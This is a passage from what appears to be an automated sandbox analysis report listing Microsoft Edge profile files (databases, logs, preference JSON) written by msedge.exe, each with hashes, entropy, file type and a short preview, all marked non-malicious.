                                                                                                                                                                                                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMYSAELyKOMq+8yC8F/YfU5m+OlTLVum+:Bq+n0JY9ELyKOMq+8y9/Owd
                                                                                                                                                                                                                                                                                                                          MD5:1D5CF1DF51AACAAB4C9BC5F870931500
                                                                                                                                                                                                                                                                                                                          SHA1:ADEC7026A99F9E7BAFA34C90EACADC4AB146497C
                                                                                                                                                                                                                                                                                                                          SHA-256:934E4FD261421F160144C5F1FCA95B2A82ADFD64EE09F4A04D824270DC8F73D2
                                                                                                                                                                                                                                                                                                                          SHA-512:DB345A6C3628326B25B7B4A28E7A0F12913FBAF035AFDED90A0D257C51DEBDE3461F741598EA71DC012523BB1DBB0218E504A8FC609EBF64C24ECD31F7415A19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46662596747982116
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0Da:v7doKsKuKZKlZNmu46yjx0G
                                                                                                                                                                                                                                                                                                                          MD5:7817063E3ECD9122BF2ED948D3A07DC2
                                                                                                                                                                                                                                                                                                                          SHA1:74A249689BF065C56B741CE2EF8254FD51B12873
                                                                                                                                                                                                                                                                                                                          SHA-256:7BA422FEE12FFBF6B796841D8CDCABC0B8145E983946563B93267DC69D4A3764
                                                                                                                                                                                                                                                                                                                          SHA-512:3038DFB722C24547BBEE48ADC947B34B4A3AA1E57475F0DCDBB19505FFABEDC7D64BD3C70F1A4A6A93BF1611DEFC97B6457151A26E186F69CC30DFF23C8C99F1
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c4e8cadd-9369-4631-99e9-f1a6435d6204.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e848f6da-2967-4192-bdd2-66434a301f08.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17023), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):17027
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4505040917342775
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBohbGIQwY6WTaTY7u:sTOxuJZf7UWbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:62F5B8A35E469BD70895DE901046F9AF
                                                                                                                                                                                                                                                                                                                          SHA1:BE243634FC429530384BD124FE4448406C5B1919
                                                                                                                                                                                                                                                                                                                          SHA-256:C4E2668D4A4F31E810A3863F116ADB2A48D10201D404C8D05D72506C1472E123
                                                                                                                                                                                                                                                                                                                          SHA-512:438361DB4631A6A0ACFA5B01AED7FA86C1F9336D95CC1F8A543D5E2897CC705270939D14169E52015F80161FCFD99B4BA4C9C6F895E0789C5A01A3715D76D86C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f12cb3ad-a7d6-4e8b-bd48-142df7b9f950.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):38626
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.554568395177905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:CJakCwh7pLGLhgGWPSMf0V8F1+UoAYDCx9Tuqh0VfUC9xbog/OVjE0TMkUrwCsKL:CJakCwXchgGWPSMf0Vu1ja95kNCsKNvB
                                                                                                                                                                                                                                                                                                                          MD5:25403A3A82CD106DF8F34777BF7BBD3B
                                                                                                                                                                                                                                                                                                                          SHA1:5D76480B317925C5686C44E3BD397B5AAB18E65C
                                                                                                                                                                                                                                                                                                                          SHA-256:571D3E6A2C9C11C464BD046D546C3E7680A77993361472A1D760CCA9B8EB8497
                                                                                                                                                                                                                                                                                                                          SHA-512:79561E1B1DE6E2B097A28CEF93CD4BEE0FE40227105525582818D84387A6F76304A8204F5918036363CB242A16794C6F8DDA77E6887266EDA67A8D4FB4C14E6F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10265547996659595
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:+RL+URL+FspEjVl/PnnnnnnnnnnnvoQ/Eou:+oUo+oPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                                          MD5:F8A278F13B1FAB45077285E96DB92F5D
                                                                                                                                                                                                                                                                                                                          SHA1:75DB7A2505D9C6C30585BCA6E8B2285CBA1F56DE
                                                                                                                                                                                                                                                                                                                          SHA-256:8D24892DCD9275C2F2C71CD1BC2A85BEFC67C97FDA163288479DC2582DA107DA
                                                                                                                                                                                                                                                                                                                          SHA-512:84ECBF598618DF8BF3EEC4A98BE5EED451FDF9489C65E4327A44CDD357DFAA5A4A4C8CE4B8FFEC28A580F2937F9C8C3D0E48340F23C0EC0E30BFA4F9F7C1DC24
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:..-.............M........1.x+....4..}...y.p......-.............M........1.x+....4..}...y.p............I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8889582805380969
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:G2V8yH/AwaSceady+HLP3H8w12yv8nytytsycyP9y7xyQb:oz
                                                                                                                                                                                                                                                                                                                          MD5:7F56E4C9E001C4DCAB6EDFBF15E57245
                                                                                                                                                                                                                                                                                                                          SHA1:E9DA590587F6E73B8C4E1A3902552B194C50681C
                                                                                                                                                                                                                                                                                                                          SHA-256:38D4238424CCCA6796EBE64AA00DBEC7146E81AB7804B78F2109371D123C5522
                                                                                                                                                                                                                                                                                                                          SHA-512:5F7003B5101625E7AEF27F0176468747FE40CB63EF93F1E9C9B39467314320AAA81342E8048C33C8FD6AACEFF1804915F481ADBCAE7C748B156E3E30D42C44A9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):694
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5541561316994215
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuOlluJoZ8r:iDTlg3
                                                                                                                                                                                                                                                                                                                          MD5:190FF2F506CD2B4FBA8B32277CEF6133
                                                                                                                                                                                                                                                                                                                          SHA1:745B8AB804DFA239E3B36529A6E1E31C7380B88C
                                                                                                                                                                                                                                                                                                                          SHA-256:065E6E998E9CC0CCB6004A47E1115007BB5074A32B7E9313AF06129703FEBEC6
                                                                                                                                                                                                                                                                                                                          SHA-512:07DC34B900CEDAEA0A964B760791761F6E56BCA1C5242066C2057F00F9424A90A116B67FD5A38EFDF675BBFC1EF4F5FDD41797F6DB95DF51E543827610E8FE34
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............0...;...............#38_h.......6.Z..W.F......}n......}n..........V.e................V.e................V.e.................k..0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.197603056225723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uLZ+q2P923oH+TcwtfrK+IFUtQucZmwuucVkwO923oH+TcwtfrUeLJ:76uLUv4Yeb23FUtQuc/uuc5LYeb3J
                                                                                                                                                                                                                                                                                                                          MD5:47061CD87372191BB4658BBF3D481F55
                                                                                                                                                                                                                                                                                                                          SHA1:4CB6E3F49A2FC43ABE783ADF05679F4251559564
                                                                                                                                                                                                                                                                                                                          SHA-256:2C5CCF6C62EDC8831643B92DCEB74AC09926660B7A56FAD53F01A718327C645B
                                                                                                                                                                                                                                                                                                                          SHA-512:0BD4056A870B7BB40A43D10C52CBC19E132F583C09B096E8087E4E22B211880208803769D35FB6144AB12AC5721E903DA01DBE1BA111730CF81EFB9D412BCC79
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.714 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/12-11:23:05.717 1bc8 Recovering log #3.2025/01/12-11:23:05.717 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.197603056225723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uLZ+q2P923oH+TcwtfrK+IFUtQucZmwuucVkwO923oH+TcwtfrUeLJ:76uLUv4Yeb23FUtQuc/uuc5LYeb3J
                                                                                                                                                                                                                                                                                                                          MD5:47061CD87372191BB4658BBF3D481F55
                                                                                                                                                                                                                                                                                                                          SHA1:4CB6E3F49A2FC43ABE783ADF05679F4251559564
                                                                                                                                                                                                                                                                                                                          SHA-256:2C5CCF6C62EDC8831643B92DCEB74AC09926660B7A56FAD53F01A718327C645B
                                                                                                                                                                                                                                                                                                                          SHA-512:0BD4056A870B7BB40A43D10C52CBC19E132F583C09B096E8087E4E22B211880208803769D35FB6144AB12AC5721E903DA01DBE1BA111730CF81EFB9D412BCC79
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.714 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/12-11:23:05.717 1bc8 Recovering log #3.2025/01/12-11:23:05.717 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):787
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                                          MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                                          SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                                          SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                                          SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):342
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.158568551697825
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u2+q2P923oH+TcwtfrzAdIFUtQufZmwuufVkwO923oH+TcwtfrzILJ:76u3v4Yeb9FUtQuf/uuN5LYeb2J
                                                                                                                                                                                                                                                                                                                          MD5:60FA0C6E874404B253A99A985B442B9D
                                                                                                                                                                                                                                                                                                                          SHA1:E9E4E6B80BC1FFB1917A19C7D3A367618095FEFC
                                                                                                                                                                                                                                                                                                                          SHA-256:BD161416D82C9E93D0F40122A1047C08140D3823D10E4540C77EBD1A79321C70
                                                                                                                                                                                                                                                                                                                          SHA-512:F6C63B8757C7B70B97CC3F8140FB69A2BABD9F24457191F7F88F7E188C1AF33D9BF18D8882AF64C84DA667FC0A28F47183181C6FA2B06D5F218EA5D73B7E5519
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.707 1ff8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/12-11:23:05.708 1ff8 Recovering log #3.2025/01/12-11:23:05.708 1ff8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):342
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.158568551697825
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u2+q2P923oH+TcwtfrzAdIFUtQufZmwuufVkwO923oH+TcwtfrzILJ:76u3v4Yeb9FUtQuf/uuN5LYeb2J
                                                                                                                                                                                                                                                                                                                          MD5:60FA0C6E874404B253A99A985B442B9D
                                                                                                                                                                                                                                                                                                                          SHA1:E9E4E6B80BC1FFB1917A19C7D3A367618095FEFC
                                                                                                                                                                                                                                                                                                                          SHA-256:BD161416D82C9E93D0F40122A1047C08140D3823D10E4540C77EBD1A79321C70
                                                                                                                                                                                                                                                                                                                          SHA-512:F6C63B8757C7B70B97CC3F8140FB69A2BABD9F24457191F7F88F7E188C1AF33D9BF18D8882AF64C84DA667FC0A28F47183181C6FA2B06D5F218EA5D73B7E5519
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.707 1ff8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/12-11:23:05.708 1ff8 Recovering log #3.2025/01/12-11:23:05.708 1ff8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                          Encrypted:false
